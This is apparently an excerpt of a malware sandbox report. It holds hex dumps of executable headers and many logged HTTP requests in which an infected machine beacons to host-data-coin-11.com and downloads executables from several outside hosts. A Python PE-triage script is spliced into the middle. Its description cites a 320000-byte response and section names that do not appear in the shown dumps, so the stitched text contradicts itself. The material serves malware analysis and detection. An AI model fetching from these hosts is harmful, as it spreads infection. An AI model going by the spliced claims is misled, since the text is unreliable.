00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 
2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:04 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 
00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 19:24:07 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 16:06:29 GMTETag: "6ff1c1-5d58cfc604e56"Accept-Ranges: bytesContent-Length: 7336385Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 cb 9e e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 25 0a 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
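Every HTTP response above is served as application/x-msdos-program, application/x-msdownload or application/octet-stream and starts with an MZ/PE header, and the dump shows enough of each header to triage the file before it is ever run: e_lfanew, machine type, section count, link timestamp and the section table. The script below is an added example (not part of the report and not Joe Sandbox's tooling) that reads those fields from a "Data Raw:" hex prefix and applies three first-look checks: non-standard section names, a section whose VirtualSize dwarfs its on-disk size (memory reserved for code that a stub unpacks at run time), and whether the section table accounts for the full Content-Length. The sample header is constructed with struct.pack from the values visible in the dump of the 320000-byte response (seven sections named .text, .data, .wumened, .kilohe, .putohox, .rsrc and .reloc, TimeDateStamp 0x602ea3b5, SizeOfImage 0x15e000); fields the script does not read are zero-filled, so it is not a byte-exact copy of the dump.

```python
import struct
from dataclasses import dataclass
from datetime import datetime, timezone

IMAGE_DOS_SIGNATURE = 0x5A4D       # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550    # "PE\0\0"
# Section names a normal toolchain emits; anything else points at a packer or custom stub.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
                   ".pdata", ".tls", ".bss", ".CRT", ".gfids", "_RDATA"}


@dataclass
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_pointer: int
    characteristics: int


@dataclass
class PeSummary:
    machine: int
    timestamp: int
    size_of_image: int
    sections: list


def report_hex_to_bytes(text):
    """Accept a bare hex string or a whole report line containing 'Data Raw: 4d 5a ...'."""
    return bytes.fromhex(text.split("Data Raw:", 1)[1] if "Data Raw:" in text else text)


def parse_pe_prefix(data):
    """Parse DOS header, COFF file header and section table. Sandbox dumps are prefixes
    of the file, so every offset is bounds-checked and a short dump raises ValueError."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt + 60 > len(data):
        raise ValueError("optional header truncated")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):                       # PE32 / PE32+
        raise ValueError(f"unexpected optional header magic 0x{magic:x}")
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]  # same offset for PE32 and PE32+
    table, sections = opt + opt_size, []
    for i in range(nsec):
        off = table + 40 * i
        if off + 40 > len(data):
            raise ValueError(f"section table truncated after {i} of {nsec} entries")
        f = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append(Section(f[0].rstrip(b"\0").decode("ascii", "replace"), f[1], f[2], f[3], f[4], f[9]))
    return PeSummary(machine, timestamp, size_of_image, sections)


def header_error(data):
    """The ValueError message for a bad or truncated dump, or None when it parses."""
    try:
        parse_pe_prefix(data)
        return None
    except ValueError as err:
        return str(err)


def triage(pe, content_length=None):
    """First-look heuristics; returns human-readable findings."""
    findings = []
    odd = [s.name for s in pe.sections if s.name not in COMMON_SECTIONS]
    if odd:
        findings.append("non-standard section names: " + ", ".join(odd))
    for s in pe.sections:
        # Huge VirtualSize over a tiny on-disk image: memory reserved for code unpacked at run time.
        if s.virtual_size > 16 * max(s.raw_size, 0x200):
            findings.append(f"{s.name}: VirtualSize 0x{s.virtual_size:x} far exceeds SizeOfRawData 0x{s.raw_size:x}")
    end = max(s.raw_pointer + s.raw_size for s in pe.sections)
    if content_length is not None and content_length != end:
        findings.append(f"Content-Length {content_length} != {end} implied by the section table (overlay or truncated download)")
    return findings


def build_sample_header():
    """CONSTRUCTED sample: DOS header (e_lfanew 0xd8), zeroed stub, file header, a PE32 optional
    header with only Magic and SizeOfImage set, and the seven section entries read from the
    report's dump of the 320000-byte response."""
    dos = struct.pack("<2sH", b"MZ", 0x90) + b"\0" * 0x38 + struct.pack("<I", 0xD8)
    file_header = struct.pack("<IHHIIIHH", IMAGE_NT_SIGNATURE, 0x14C, 7, 0x602EA3B5, 0, 0, 0xE0, 0x0102)
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x10B)
    struct.pack_into("<I", optional, 56, 0x15E000)
    rows = [  # name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics
        (b".text",    0x3E36E,  0x1000,   0x3E400, 0x400,   0x60000020),
        (b".data",    0x10C988, 0x40000,  0x1800,  0x3E800, 0xC0000040),
        (b".wumened", 0x5,      0x14D000, 0x200,   0x40000, 0xC0000040),
        (b".kilohe",  0xEA,     0x14E000, 0x200,   0x40200, 0xC0000040),
        (b".putohox", 0xD93,    0x14F000, 0xE00,   0x40400, 0xC0000040),
        (b".rsrc",    0x8728,   0x150000, 0x8800,  0x41200, 0x40000040),
        (b".reloc",   0x465A,   0x159000, 0x4800,  0x49A00, 0x42000040),
    ]
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, vs, va, rs, rp, ch in rows)
    return dos + b"\0" * (0xD8 - len(dos)) + file_header + bytes(optional) + table


if __name__ == "__main__":
    pe = parse_pe_prefix(report_hex_to_bytes("Data Raw: " + build_sample_header().hex(" ")))
    linked = datetime.fromtimestamp(pe.timestamp, tz=timezone.utc)
    print(f"machine 0x{pe.machine:x}, {len(pe.sections)} sections, linked {linked:%Y-%m-%d %H:%M:%S} UTC, "
          f"SizeOfImage 0x{pe.size_of_image:x}")
    for line in triage(pe, content_length=320000):
        print(" -", line)
```

To run it on the real dump, pass the report line itself to report_hex_to_bytes. On the sample the section table ends exactly at byte 320000, matching the Content-Length of that response, .data reserves about 1.1 MB of virtual space for 6 KB on disk, and the three invented section names are reported; the same checks applied to the 324608-byte response, whose dump shows sections named .zic, .wuvuhus and .jufot with the same layout, give the same picture.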
                      Source: unknown | HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49941 version: TLS 1.0
                      Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49942 version: TLS 1.0
                      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://cosjvii.net/; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Length: 211; Host: host-data-coin-11.com
                      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://efywdpqsv.com/; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Length: 289; Host: host-data-coin-11.com
                      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://vucofkhoh.org/; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Length: 303; Host: host-data-coin-11.com
                      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://glphw.com/; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Length: 175; Host: host-data-coin-11.com
                      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://oyaibbgc.net/; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Length: 278; Host: host-data-coin-11.com
                      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://nkvfp.net/; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Length: 163; Host: host-data-coin-11.com
                      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://ojffxid.net/; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Length: 263; Host: host-data-coin-11.com
                      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://qctnjb.net/; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Length: 349; Host: host-data-coin-11.com
                      Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Host: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://vjrurwpaf.net/; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Length: 116; Host: host-data-coin-11.com
                      Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://cadsuqagh.net/; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Length: 326; Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://meblvhu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyxemdoi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syoeagb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xlertqbun.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://blagu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kkmdou.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qbjnsl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ornpwmrp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rlhvsc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rtrryuils.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scgsgbtih.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akyloc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahoawm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmfhwtjj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lfyjw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sipqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jnlltxxq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdbgmr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vxwgswks.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ksfdeabujk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bsgftsru.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfmcm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hiwcjtiwj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tmqcl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://opsdg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdqepw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qbbvlw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://giykrj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dnoukoye.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: host-data-coin-11.com
